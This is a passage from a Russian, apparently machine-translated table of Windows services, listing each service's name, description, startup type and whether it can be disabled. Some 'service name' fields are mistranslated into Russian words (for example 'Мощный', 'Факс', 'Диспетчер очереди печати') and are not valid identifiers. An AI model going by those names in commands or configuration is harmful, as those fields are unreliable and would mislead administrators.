Имя службы	EntAppSvc
Описание	Позволяет управлять корпоративными приложениями.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Расширяемый протокол проверки подлинности

Имя	Описание
Имя службы	EapHost
Описание	Служба расширяемого протокола проверки подлинности (EAP) обеспечивает проверку подлинности в сети в таких сценариях, как 802.1x (проводные и беспроводные сети), VPN и защита доступа к сети (NAP). EAP также обеспечивает поддержку программных интерфейсов (API), используемых клиентами доступа к сети, такими как беспроводной клиент и VPN-клиент, в процессе проверки подлинности. Если эта служба отключена, компьютеру не удастся получить доступ к сетям, требующим проверку подлинности EAP.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Факс

Имя	Описание
Имя службы	Факс
Описание	Позволяет отправлять и получать факсы, используя ресурсы факсов, доступные на этом компьютере или в сети.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба журнала файлов

Имя	Описание
Имя службы	fhsvc
Описание	Защищает пользовательские файлы от случайной потери путем их копирования в расположение резервной копии.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Хост поставщика функции обнаружения

Имя	Описание
Имя службы	fdPHost
Описание	В службе FDPHOST размещаются поставщики обнаружения сетевых ресурсов компонента обнаружения функций. Эти поставщики обнаружения функций обеспечивают службы обнаружения сетевых ресурсов для протоколов SSDP и WS-D. Остановка или отключение службы FDPHOST приведет к отключению обнаружения сетевых ресурсов для этих протоколов при использовании обнаружения функций. Если эта служба недоступна, сетевые службы, работа которых зависит от компонента обнаружения функций и данных протоколов обнаружения, не смогут находить сетевые устройства или ресурсы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Публикация ресурсов обнаружения функции

Имя	Описание
Имя службы	FDResPub
Описание	Публикует этот компьютер и подключенные к нему ресурсы, чтобы их можно было обнаружить по сети. Если эта служба остановлена, сетевые ресурсы больше не будут публиковаться и не будут обнаруживаться другими компьютерами в сети.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

GameDVR и служба пользователей широковещательной трансляции

Имя	Описание
Имя службы	BcastDVRUserService_3bc9c
Описание	Эта пользовательская служба используется для записи игр и вещания в прямом эфире.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба географического положения

Имя	Описание
Имя службы	lfsvc
Описание	Эта служба отслеживает текущее расположение системы и управляет геозонами (географическое местоположение со связанными событиями). Если вы отключите эту службу, приложения не смогут использовать или получать уведомления для геолокации или геозон.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Отключение этой службы прерывает работу приложений, которые от нее зависят. Можно отключить, если приложения от нее не зависят.

GraphicsPerfSvc

Имя	Описание
Имя службы	GraphicsPerfSvc
Описание	Служба монитора производительности графики
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Клиент групповой политики

Имя	Описание
Имя службы	gpsvc
Описание	Эта служба отвечает за применение параметров, настроенных администраторами для компьютера и пользователей, посредством компонента групповой политики. Если служба отключена, параметры не будут применены и управление приложениями и компонентами посредством групповой политики будет невозможно. Кроме того, если служба отключена, компоненты и приложения, зависящие от компонента групповой политики, могут быть неработоспособны.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба HID

Имя	Описание
Имя службы	hidserv
Описание	Активирует клавиши быстрого вызова на клавиатурах, пультах дистанционного управления и других мультимедийных устройствах, а также поддерживает их использование. Рекомендуется оставить эту службу активной.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба узла HV

Имя	Описание
Имя службы	HvHost
Описание	Предоставляет интерфейс для низкоуровневой оболочки Hyper-V, обеспечивающий функционирование счетчиков производительности по разделам для оперативной системы узла.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Повышает производительность для гостевых виртуальных машин. Не используется сегодня, за исключением явно заполненных виртуальных машин, но будет использоваться в Application Guard.

Служба обмена данными (Hyper-V)

Имя	Описание
Имя службы	vmickvpexchange
Описание	Служба предоставляет механизм обмена данными между виртуальной машиной и операционной системой физического компьютера.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Интерфейс гостевой службы Hyper-V

Имя	Описание
Имя службы	vmicguestinterface
Описание	Предоставляет интерфейс для взаимодействия узла Hyper-V с определенными службами, которые выполняются на виртуальной машине.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба завершения работы в качестве гостя (Hyper-V)

Имя	Описание
Имя службы	vmicshutdown
Описание	Предоставляет механизм для завершения работы операционной системы этой виртуальной машины из интерфейсов управления на физическом компьютере.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба пульса (Hyper-V)

Имя	Описание
Имя службы	vmicheartbeat
Описание	Отслеживает состояние этой виртуальной машины, регулярно сообщая о пульсе. Эта служба помогает определить работающие виртуальные машины, которые перестали отвечать на запросы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба PowerShell Direct для Hyper-V

Имя	Описание
Имя службы	vmicvmsession
Описание	Обеспечивает механизм управления виртуальной машиной через PowerShell с помощью сеанса виртуальной машины без виртуальной сети.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба виртуализации удаленных рабочих столов Hyper-V

Имя	Описание
Имя службы	vmicrdv
Описание	Служба предоставляет платформу для обмена данными между виртуальной машиной и операционной системой физического компьютера.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба синхронизации времени Hyper-V

Имя	Описание
Имя службы	vmictimesync
Описание	Синхронизирует системное время виртуальной машины с системным временем физического компьютера.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Служба запросов на теневое копирование томов Hyper-V

Имя	Описание
Имя службы	vmicvss
Описание	Согласовывает обмен данными, необходимыми при использовании службы теневого копирования томов для резервного копирования приложений и данных на этой виртуальной машине с операционной системы физического компьютера.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	См. сведения о службе HvHost

Модули ключей IPsec для обмена ключами в Интернете и протокола IP с проверкой подлинности

Имя	Описание
Имя службы	IKEEXT
Описание	Служба IKEEXT содержит модули для работы с ключами по протоколу IKE и AuthIP. Эти модули для работы с ключами используются при проверке подлинности и обмене ключами в протоколе безопасности IP (IPsec). Остановка или отключение службы IKEEXT ведет к отключению обмена ключами IKE и AuthIP с одноранговыми компьютерами. Как правило, IPsec настроен на использование IKE или AuthIP. Таким образом, остановка или отключение службы IKEEXT может привести к сбою в работе IPsec и поставить под угрозу безопасность системы. Настоятельно рекомендуется, чтобы служба IKEEXT была включена.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Общий доступ к подключению к Интернету (ICS)

Имя	Описание
Имя службы	SharedAccess
Описание	Предоставляет службы преобразования сетевых адресов, адресации, разрешения имен и предотвращения вторжения для домашней сети или сети небольшого офиса.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Требуется для клиентов, используемых в качестве точек доступа Wi-Fi, а также на обоих концах проекции Miracast. ICS можно заблокировать с помощью параметра объекта групповой политики «Запрет использования общего интернет-подключения в DNS-домене»

Вспомогательная служба IP

Имя	Описание
Имя службы	iphlpsvc
Описание	Обеспечивает возможность туннельного подключения с помощью технологий туннелирования для IPv6 (6to4, ISATAP, Port Proxy и Teredo) и IP-HTTPS. Если эта служба остановлена, компьютер не будет иметь преимуществ расширенного подключения, которые предлагают эти технологии.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Служба конфигурации преобразования IP-адресов

Имя	Описание
Имя службы	IpxlatCfgSvc
Описание	Настраивает и включает перевод с версии 4 на версию 6 и наоборот
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Агент политики IPSec

Имя	Описание
Имя службы	PolicyAgent
Описание	Служба IPsec поддерживает одноранговую проверку подлинности на уровне сети, проверку подлинности источника данных, проверку целостности данных, их конфиденциальность (шифрование) и защиту от повторения. Эта служба вводит в действие политики IPsec, созданные с помощью оснастки «Политики IP-безопасности» или программы командной строки «netsh ipsec». Остановка этой службы может привести к возникновению проблем с сетевыми подключениями, если политика требует, чтобы соединения использовали IPsec. Кроме того, если эта служба остановлена, то удаленное управление брандмауэром Windows недоступно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

KtmRm для координатора распределенных транзакций

Имя	Описание
Имя службы	KtmRm
Описание	Координирует транзакции между координатором распределенных транзакций (MSDTC) и диспетчером транзакций ядра (KTM). Если эта служба не требуется, рекомендуется не запускать ее. Если она потребуется, MSDTC и KTM автоматически запустят ее. Если служба отключена, то при взаимодействии MSDTC с диспетчером транзакций ядра будут возникать ошибки и запуск всех служб, явно зависящих от нее, станет невозможным.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба «Взаимодействие с языком»

Имя	Описание
Имя службы	LxpSvc
Описание	Предоставляет поддержку инфраструктуры для развертывания и настройки локализованных ресурсов Windows. Эта служба запускается по запросу, и, если она отключена, дополнительные языки Windows не будут развернуты в системе, и Windows может работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Тополог канального уровня

Имя	Описание
Имя службы	lltdsvc
Описание	Создает карту сети, состоящую из сведений о топологии (подключении) ПК и устройств, а также метаданных, описывающих каждый ПК и устройство. Если служба отключена, карта сети не будет работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Можно отключить, если нет зависимостей от карты сети.

Служба помощника по локальному профилю

Имя	Описание
Имя службы	wlpasvc
Описание	Эта служба обеспечивает управление профилями для модулей удостоверений подписчиков.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Диспетчер локальных сеансов

Имя	Описание
Имя службы	LSM
Описание	Основная служба Windows, которая управляет сеансами локального пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба обмена сообщениями

Имя	Описание
Имя службы	MessagingService_3bc9c
Описание	Служба, поддерживающая обмен текстовыми сообщениями и связанные функции.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Стандартная служба сборщика центра диагностики Microsoft (R)

Имя	Описание
Имя службы	diagnosticshub.standardcollector.service
Описание	Стандартная служба сборщика центра диагностики. Если эта служба запущена, она собирает данные о событиях трассировки событий в реальном времени и обрабатывает их.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Помощник по входу в учетную запись Майкрософт

Имя	Описание
Имя службы	wlidsvc
Описание	Обеспечивает вход в систему на основе служб удостоверений учетных записей Майкрософт. Если эта служба остановлена, пользователи не смогут входить на компьютер с помощью своих учетных записей Майкрософт.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Клиент Microsoft App-V

Имя	Описание
Имя службы	AppVClient
Описание	Управляет пользователями App-V и виртуальными приложениями
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Служба проверки сети антивирусной программы Microsoft Defender

Имя	Описание
Имя службы	WdNisSvc
Описание	Обеспечивает защиту от попыток вторжения, направленных на известные и недавно обнаруженные уязвимости в сетевых протоколах.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба антивирусной программы Microsoft Defender

Имя	Описание
Имя службы	WinDefend
Описание	Обеспечивает защиту от вредоносных и других потенциально нежелательных программ.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба повышения прав Microsoft Edge

Имя	Описание
Имя службы	MicrosoftEdgeElevationService
Описание	Поддерживает Обновление Microsoft Edge. Если эта служба отключена, приложение не будет поддерживаться в актуальном состоянии.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба Центр обновления Microsoft Edge

Имя	Описание
Имя службы	edgeupdate
Описание	Обеспечивает актуальность программного обеспечения Майкрософт. Если эта служба отключена или остановлена, ваше программное обеспечение Майкрософт не будет поддерживаться в актуальном состоянии, а это означает, что уязвимости системы безопасности, которые могут возникнуть, не могут быть устранены, а функции могут не работать. Эта служба удаляется, если ее не использует программное обеспечение Майкрософт.
Установка	Всегда устанавливается
Тип запуска	Автоматически (отложенный запуск)
Рекомендации	Не отключать
Комментарии	Нет

Служба Центр обновления Microsoft Edge (edgeupdatem)

Имя	Описание
Имя службы	edgeupdatem
Описание	Обеспечивает актуальность программного обеспечения Майкрософт. Если эта служба отключена или остановлена, ваше программное обеспечение Майкрософт не будет поддерживаться в актуальном состоянии, а это означает, что уязвимости системы безопасности, которые могут возникнуть, не могут быть устранены, а функции могут не работать. Эта служба удаляется, если ее не использует программное обеспечение Майкрософт.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба инициатора Майкрософт iSCSI

Имя	Описание
Имя службы	MSiSCSI
Описание	Управление сеансами Internet SCSI (iSCSI) между компьютером и удаленными целевыми устройствами iSCSI. Если эта служба остановлена, компьютер не сможет выполнить вход в систему или получить доступ к целевым устройствам iSCSI. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет.

Фильтр клавиатуры (Майкрософт)

Имя	Описание
Имя службы	MsKeyboardFilter
Описание	Управление фильтрацией и сопоставлением нажатия клавиш
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Microsoft Passport

Имя	Описание
Имя службы	NgcSvc
Описание	Обеспечивает изоляцию процесса для криптографических ключей, используемых для проверки подлинности в связанных поставщиках удостоверений пользователя. Если эта служба отключена, все варианты использования этих ключей и управления ими не будут доступны, включая вход в систему компьютера и единый вход для приложений и веб-сайтов. Эта служба запускается и останавливается автоматически. Рекомендуется не перенастраивать эту службу.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Требуется для входа в систему с ПОМОЩЬЮ ПИН-кода или Приветствия.

Контейнер Microsoft Passport

Имя	Описание
Имя службы	NgcCtnrSvc
Описание	Управляет ключами удостоверений локальных пользователей, используемыми для проверки подлинности пользователя в системах поставщиков удостоверений, а также виртуальными смарт-картами TPM. Если эта служба отключена, ключи удостоверений локальных пользователей и виртуальные смарт-карты TPM будут недоступны. Рекомендуется не перенастраивать эту службу.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Поставщик теневого копирования программного обеспечения Майкрософт

Имя	Описание
Имя службы	swprv
Описание	Управляет программным созданием теневых копий службой теневого копирования тома. Если эта служба остановлена, то управление программным созданием теневых копий невозможно. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Дисковые пространства Майкрософт (SMP)

Имя	Описание
Имя службы	smphost
Описание	Хост-служба для поставщика управления дисковыми пространствами Майкрософт. Если эта служба остановлена ​​или отключена, дисковыми пространствами нельзя управлять.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	API управления хранилищем не работают без этой службы. Пример: «Get-WmiObject -class MSFT_Disk -Namespace Root\Microsoft\Windows\Storage».

Служба установки Microsoft Store

Имя	Описание
Имя службы	InstallService
Описание	Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по требованию, и, если она отключена, установки не будут работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба маршрутизатора SMS Microsoft Windows

Имя	Описание
Имя службы	SmsRouter
Описание	Направляет сообщения на основе правил соответствующим клиентам.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Проверка подлинности на основе физических параметров

Имя	Описание
Имя службы	NaturalAuthentication
Описание	Служба агрегатора сигналов, которая оценивает сигналы на основе времени, сети, геолокации, bluetooth и cdf факторов. Поддерживаемые функции: разблокировка устройства, динамическая блокировка и политики MDM Dynamo.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба совместного использования портов Net.Tcp

Имя	Описание
Имя службы	NetTcpPortSharing
Описание	Предоставляет возможность совместно использовать TCP-порты с помощью протокола net.tcp.
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Служба входа в сеть

Имя	Описание
Имя службы	Служба входа в сеть
Описание	Эта служба обеспечивает безопасный канал между данным компьютером и контроллером домена, служащий для аутентификации пользователей и служб. Если служба остановлена, компьютер не сможет проверять подлинность пользователей и служб, а контроллер домена не сможет регистрировать записи DNS. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Автоматическая настройка сетевых устройств

Имя	Описание
Имя службы	NcdAutoSetup
Описание	Служба автоматической установки сетевых устройств отслеживает и устанавливает соответствующие устройства, которые подключаются к определенной сети. Остановка или отключение этой службы помешает Windows автоматически обнаруживать и устанавливать соответствующие сетевые устройства. Пользователи по-прежнему могут вручную добавлять подключенные к сети устройства на компьютер через пользовательский интерфейс.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Посредник подключений к сети

Имя	Описание
Имя службы	NcbService
Описание	Выполняет функции посредника для подключений, благодаря чему приложения Microsoft Store могут получать уведомления из Интернета.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Сетевые подключения

Имя	Описание
Имя службы	Netman
Описание	Управляет объектами папки »Сеть и удаленный доступ к сети», отображающей подключения к локальной сети и подключения удаленного доступа.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Помощник по подключению к сети

Имя	Описание
Имя службы	NcaSvc
Описание	Предоставляет уведомление о состоянии DirectAccess для компонентов пользовательского интерфейса.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба списка сетей

Имя	Описание
Имя службы	netprofm
Описание	Определяет сети, к которым подключен компьютер, собирает и хранит данные о свойствах этих сетей и оповещает приложения об изменении этих свойств.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба сведений о подключенных сетях

Имя	Описание
Имя службы	NlaSvc
Описание	Собирает и сохраняет сведения о конфигурации сети и уведомляет программы при изменении этих сведений. Если эта служба будет остановлена, сведения о конфигурации могут стать недоступными. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Служба настройки сети

Имя	Описание
Имя службы	NetSetupSvc
Описание	Служба настройки сети управляет установкой сетевых драйверов и разрешает конфигурацию низкоуровневых параметров сети. В случае остановки этой службы все выполняемые установки драйверов могут быть отменены.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба интерфейса сохранения сети

Имя	Описание
Имя службы	nsi
Описание	Эта служба доставляет сетевые уведомления (например, добавление или удаление интерфейса и т. д.) клиентам пользовательского режима. Остановка этой службы вызовет отключение от сети. При отключении данной службы явно зависимые от нее службы не смогут быть запущены.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Нет рекомендаций
Комментарии	Нет

Автономные файлы

Имя	Описание
Имя службы	CscService
Описание	Служба автономных файлов выполняет работу по обслуживанию кэша автономных файлов, отвечает на события входа пользователя в систему и выхода его из системы, реализует свойства общих API и отсылает интересующимся работой автономных файлов и изменениями состояния кэша нужные им события.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Агент проверки подлинности OpenSSH

Имя	Описание
Имя службы	SSH-agent
Описание	Агент для хранения закрытых ключей, используемых для проверки подлинности с открытым ключом.
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Оптимизация дисков

Имя	Описание
Имя службы	defragsvc
Описание	Помогает компьютеру работать более эффективно, оптимизируя файлы на дисках хранения.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Родительский контроль

Имя	Описание
Имя службы	WpcMonSvc
Описание	Применяет родительский контроль для дочерних учетных записей в Windows. Если эта служба остановлена или отключена, родительский контроль может не применяться.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Диспетчер платежей и NFC/защищенных элементов

Имя	Описание
Имя службы	SEMgrSvc
Описание	Управляет платежами и защищенными элементами на основе NFC (радиочастотная связь ближнего действия).
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

протокол PNRP;

Имя	Описание
Имя службы	PNRPsvc
Описание	Включает бессерверное разрешение имен одноранговых узлов через Интернет с помощью протокола PNRP. Если этот параметр отключен, некоторые одноранговые приложения и приложения для совместной работы, например Удаленный помощник, могут не работать.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Группирование одноранговых сетей

Имя	Описание
Имя службы	p2psvc
Описание	Обеспечивает взаимодействие с несколькими участниками с помощью одноранговой группировки. Если этот параметр отключен, некоторые приложения, например Домашняя группа, могут не работать.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Identity Manager одноранговых сетей

Имя	Описание
Имя службы	p2pimsvc
Описание	Предоставляет службы идентификации для протокола PNRP и однорангового группирования. Если они отключены, службы протокола однорангового разрешения имен (PNRP) и одноранговой группировки могут не работать, а некоторые приложения, такие как Домашняя группа и Удаленный помощник, могут работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Узел библиотеки DLL счетчика производительности

Имя	Описание
Имя службы	PerfHost
Описание	Позволяет удаленным пользователям и 64-разрядным процессам запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками. Если эта служба остановлена, только локальные пользователи и 32-разрядные процессы смогут запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками DLL.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Журналы и оповещения о производительности

Название	Описание
Имя службы	pla
Описание	Служба журналов и оповещений о производительности собирает данные с локальных и удаленных компьютеров соответственно заданным параметрам расписания, а затем записывает данные в журнал или выдает оповещение. Если эта служба остановлена, все сведения о производительности не собираются. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба телефонной связи

Имя	Описание
Имя службы	PhoneSvc
Описание	Управляет состоянием телефонии на устройстве
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Используется современными приложениями VoIP

Plug and Play

Имя	Описание
Имя службы	PlugPlay
Описание	Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба публикации имени компьютера PNRP

Имя	Описание
Имя службы	PNRPAutoReg
Описание	Эта служба публикует имя компьютера с помощью протокола разрешения одноранговых имен. Настройка управляется с помощью контекста netsh p2p pnrp peer
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба перечислителя переносных устройств

Имя	Описание
Имя службы	WPDBusEnum
Описание	Применяет групповую политику для съемных запоминающих устройств. Позволяет приложениям, таким как проигрыватель Windows Media и мастер импорта изображений, передавать и синхронизировать содержимое с помощью съемных запоминающих устройств.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Мощный

Имя	Описание
Имя службы	Мощный
Описание	Управляет политикой электропитания и доставки уведомлений на основе этой политики.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Очередь печати принтера

Имя	Описание
Имя службы	Диспетчер очереди печати
Описание	Эта служба позволяет ставить задания печати в очередь и обеспечивает взаимодействие с принтером. Если ее отключить, вы не сможете выполнять печать и видеть свои принтеры.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Расширения и уведомления для принтера

Имя	Описание
Имя службы	PrintNotify
Описание	Эта служба открывает пользовательские диалоговые окна принтера и обрабатывает уведомления с удаленного сервера печати или принтера. Если вы отключите эту службу, вы не сможете видеть расширения или уведомления для принтера.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Поддержка панели управления «Отчеты о проблемах и их решениях»

Имя	Описание
Имя службы	wercplsupport
Описание	Эта служба обеспечивает поддержку просмотра, отправки и удаления отчетов о проблемах системного уровня для панели управления «Отчеты о проблемах и их решениях».
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба «Помощник по совместимости программ»

Имя	Описание
Имя службы	PcaSvc
Описание	Обеспечивает поддержку помощника по совместимости программ. Он следит за программами, устанавливаемыми и запускаемыми пользователем, и обнаруживает известные проблемы, связанные с совместимостью. Если остановить данную службу, то помощник по совместимости программ будет работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

qWave;

Имя	Описание
Имя службы	QWAVE
Описание	Quality Windows Audio Video Experience (qWave) — сетевая платформа для приложений потоковой передачи аудио и видео в домашних сетях на основе IP-протокола. Платформа qWave обеспечивает более высокую производительность и надежность потоковой передачи аудио и видео, обеспечивая необходимое качество обслуживания сети для аудио- и видеоприложений. Платформа содержит механизмы управления доступом, отслеживания и принудительного выполнения, получения данных приложений и установки приоритета трафика.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба управления радио

Имя	Описание
Имя службы	RmSvc
Описание	Служба управления радио и режимом «в самолете»
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Рекомендуемая служба устранения неполадок

Имя	Описание
Имя службы	Устранение неполадокSvc
Описание	Включает автоматическое устранение известных проблем путем применения рекомендуемых методов устранения неполадок. Если он остановлен, на вашем устройстве не будет рекомендовано устранять неполадки на вашем устройстве.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Диспетчер автоматических подключений удаленного доступа

Имя	Описание
Имя службы	RasAuto
Описание	Создает соединение с удаленной сетью всякий раз, когда программа ссылается на имя или адрес удаленного DNS-сервера или NetBIOS.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Диспетчер подключений удаленного доступа

Имя	Описание
Имя службы	RasMan
Описание	Управляет подключениями удаленного доступа и подключениями виртуальной частной сети (VPN) с этого компьютера к Интернету или к другим удаленным сетям. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Настройка удаленного рабочего стола

Имя	Описание
Имя службы	SessionEnv
Описание	Служба настройки сервера удаленных рабочих столов (RDCS) отвечает за все действия, связанные с настройкой и обслуживанием сеансов служб удаленных рабочих столов и удаленного доступа, для которых необходим контекст SYSTEM. Это касается временных папок сеансов, тем и сертификатов удаленных рабочих столов.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Службы удаленных рабочих столов

Имя	Описание
Имя службы	TermService
Описание	Разрешает пользователям интерактивно подключаться к удаленному компьютеру. Удаленный рабочий стол и сервер узла сеансов удаленных рабочих столов зависят от данной службы. Чтобы запретить удаленное использование этого компьютера, необходимо снять флажки на вкладке «Удаленный доступ» элемента «Свойства системы» панели управления.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Перенаправитель портов пользовательского режима служб удаленных рабочих столов

Имя	Описание
Имя службы	UmRdpService
Описание	Позволяет перенаправлять принтеры, драйверы или порты для подключений по протоколу удаленного рабочего стола.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Удаленный вызов процедур (RPC)

Имя	Описание
Имя службы	RpcSs
